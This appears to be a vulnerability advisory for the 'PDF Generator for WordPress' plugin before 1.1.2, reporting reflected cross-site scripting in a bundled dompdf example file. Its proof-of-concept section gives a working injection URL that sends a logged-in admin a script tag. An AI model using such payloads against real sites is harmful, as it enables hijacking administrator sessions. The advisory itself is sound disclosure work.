WordPress Plugin Vulnerabilities
PDF Generator for WordPress < 1.1.2 - Reflected XSS
Description
The plugin includes a vendored dompdf example file which is susceptible to Reflected Cross-Site Scripting and could be used against high privilege users such as admin
Proof of Concept
Make a logged in admin open the following URL: https://example.com/wp-content/plugins/pdf-generator-for-wp/package/lib/dompdf/vendor/dompdf/dompdf/I18N/Arabic/Examples/Query.php?keyword="><script>alert(`xss`)</script>
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
cydave
Submitter
cydave
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-01-16 (about 1 years ago)
Added
2023-01-16 (about 1 years ago)
Last Updated
2023-01-16 (about 1 years ago)